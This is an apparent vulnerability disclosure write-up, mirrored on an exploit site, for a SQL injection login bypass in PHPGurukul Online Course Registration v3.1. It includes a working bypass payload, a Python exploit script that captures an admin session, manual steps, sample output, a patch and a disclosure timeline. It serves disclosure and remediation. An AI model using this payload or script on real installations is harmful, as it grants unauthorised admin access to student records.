Share
## https://sploitus.com/exploit?id=1155A3CB-07B0-51D3-AAD5-EABE7B54E29D
# CVE-2025-XXXX: Critical Authentication Bypass in PHPGurukul Online Course Registration v3.1
[](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
[](https://cwe.mitre.org/data/definitions/89.html)
[](https://github.com)
## ๐ด Vulnerability Overview
**Severe SQL Injection vulnerability** in PHPGurukul Online Course Registration System v3.1 allows **unauthenticated attackers** to bypass authentication and gain **full administrative access** without valid credentials.
### Quick Facts
- **Vendor**: PHPGurukul
- **Product**: Online Course Registration System
- **Affected Version**: v3.1
- **Vulnerability Type**: SQL Injection (CWE-89) + Authentication Bypass (CWE-287)
- **CVSS v3.1 Score**: **10.0 CRITICAL**
- **CVE ID**: CVE-2025-XXXX *(pending assignment)*
- **Discovery Date**: November 21, 2025
- **Disclosure Date**: February 19, 2026 *(90-day responsible disclosure)*
## ๐ฏ Impact
### Attack Surface
- **Attack Vector**: Network (AV:N)
- **Attack Complexity**: Low (AC:L)
- **Privileges Required**: None (PR:N)
- **User Interaction**: None (UI:N)
### Consequences
- โ
**Complete administrative access** without authentication
- โ
**Full database access** to all student records
- โ
**Data exfiltration** of personal information
- โ
**Data manipulation** - modify/delete any records
- โ
**Account takeover** - create new admin accounts
- โ
**Remote Code Execution** via file upload (secondary vulnerability)
## ๐ Technical Details
### Vulnerable Code
**File**: `/admin/index.php` (Lines 7-9)
```php
// VULNERABLE CODE
$username=$_POST['username'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'");
```
**Issue**: Direct concatenation of user input into SQL query without sanitization or prepared statements.
### SQL Injection Payload
```sql
Username: admin' OR '1'='1' --
Password: anything
```
**Query becomes**:
```sql
SELECT * FROM admin WHERE username='admin' OR '1'='1' -- ' and password='...'
```
**Result**: The `OR '1'='1'` condition is always true, and `--` comments out the password check, bypassing authentication completely.
## ๐ฃ Proof of Concept
### Automated Exploit Script
```python
#!/usr/bin/env python3
import requests
target = "http://[TARGET]/admin/index.php"
session = requests.Session()
# SQL Injection payload
payload = {
"username": "admin' OR '1'='1' -- ",
"password": "anything",
"submit": "submit"
}
# Execute bypass
response = session.post(target, data=payload, allow_redirects=True)
if "change-password" in response.url:
print(f"โ Admin access obtained!")
print(f"โ Session: {session.cookies.get('PHPSESSID')}")
print(f"โ Admin panel: {response.url}")
else:
print("โ Exploit failed")
```
### Manual Testing Steps
1. Navigate to: `http://[target]/admin/index.php`
2. Enter username: `admin' OR '1'='1' -- `
3. Enter any password
4. Click "Submit"
5. **Result**: Full admin access granted
## ๐ ๏ธ Exploitation
Run the provided exploit script:
```bash
python generate_evidence.py
```
**Output**:
```
โ HTTP Status: 200 OK
โ Redirected to: change-password.php
โ Session Cookie: PHPSESSID=9hjm2k9t36mc7dbfdh8572fjj2
โ Admin Panel Access: manage-students.php (200 OK)
โ Full administrative privileges obtained
```
## ๐ Remediation
### Immediate Fix
Replace vulnerable code with **prepared statements**:
```php
// SECURE CODE
$username = $_POST['username'];
$password = md5($_POST['password']);
// Use prepared statement
$stmt = $con->prepare("SELECT * FROM admin WHERE username = ? LIMIT 1");
$stmt->bind_param("s", $username);
$stmt->execute();
$result = $stmt->get_result();
if($result->num_rows === 1) {
$row = $result->fetch_assoc();
if($row['password'] === $password) {
// Successful login
$_SESSION['aid'] = $row['id'];
header("location:change-password.php");
exit();
}
}
// Failed login
echo "alert('Invalid credentials');";
```
### Additional Recommendations
1. **Input Validation**: Sanitize all user inputs
2. **Password Hashing**: Upgrade from MD5 to bcrypt/Argon2
3. **Rate Limiting**: Implement login attempt limits
4. **CSRF Protection**: Add CSRF tokens to forms
5. **Security Audit**: Review all database queries for similar vulnerabilities
## ๐ Additional Vulnerabilities Found
During security assessment, **46 additional vulnerabilities** were discovered:
| ID | Vulnerability | Severity | CVSS |
|----|---------------|----------|------|
| CVE-2025-XXXX-2 | Public AJAX SQL Injection | CRITICAL | 9.8 |
| CVE-2025-XXXX-3 | Time-based SQL Injection | HIGH | 8.1 |
| CVE-2025-XXXX-4 | Unrestricted File Upload RCE | CRITICAL | 9.8 |
| CVE-2025-XXXX-5 | IDOR in Student Profiles | HIGH | 7.5 |
*Full vulnerability report available in `CVE_SUBMISSION_REPORT.md`*
## ๐ Repository Structure
```
.
โโโ README.md # This file
โโโ CVE_SUBMISSION_REPORT.md # Complete technical report (10 CVE candidates)
โโโ CVE_EVIDENCE_admin_bypass.txt # Detailed exploitation evidence
โโโ generate_evidence.py # Automated PoC exploit script
โโโ final_exploitation_test.py # Full vulnerability validation suite
โโโ VENDOR_NOTIFICATION_EMAIL.txt # Responsible disclosure email
โโโ VULNERABILIDADES_CONFIRMADAS.md # White-box code analysis
โโโ ROADMAP_COMPLETO_CVE.md # CVE submission guide
```
## โ๏ธ Responsible Disclosure Timeline
- **November 21, 2025**: Vulnerability discovered
- **November 21, 2025**: Vendor notified (phpgurukul@gmail.com)
- **December 5, 2025**: Follow-up #1 (no response)
- **December 21, 2025**: Follow-up #2 (no response)
- **February 19, 2026**: **Public disclosure** (90 days - no patch released)
- **February 19, 2026**: CVE submission to MITRE
## ๐ Affected Systems
### Confirmed Vulnerable
- PHPGurukul Online Course Registration System **v3.1**
### Potentially Vulnerable
- All versions prior to v3.1 (unpatched)
- Other PHPGurukul products using similar authentication patterns
### Download Source
- [PHPGurukul Official Website](https://phpgurukul.com/online-course-registration-system-using-php-and-mysql/)
## ๐จ Disclaimer
This research was conducted:
- โ
In a **controlled local environment**
- โ
Following **responsible disclosure** practices
- โ
With **no malicious intent**
- โ
For **educational and security improvement purposes**
- โ
Complying with **CVD (Coordinated Vulnerability Disclosure)** standards
**No production systems were accessed or harmed.**
## ๐จโ๐ป Author
**Security Researcher**
- GitHub: https://github.com/felipecsptbr/
- Email: felipecs20221@gmail.com
- Date: November 21, 2025
## ๐ License
This research is published for **educational purposes** under responsible disclosure principles.
## ๐ References
- [MITRE CVE Program](https://cve.mitre.org/)
- [NVD - National Vulnerability Database](https://nvd.nist.gov/)
- [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html)
- [CWE-287: Improper Authentication](https://cwe.mitre.org/data/definitions/287.html)
- [CVSS v3.1 Calculator](https://www.first.org/cvss/calculator/3.1)
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)
---
**โ ๏ธ WARNING**: This vulnerability allows complete system compromise. Update immediately or implement the provided security patch.
**CVE Status**: Pending MITRE assignment โข **Severity**: CRITICAL โข **Exploitability**: Trivial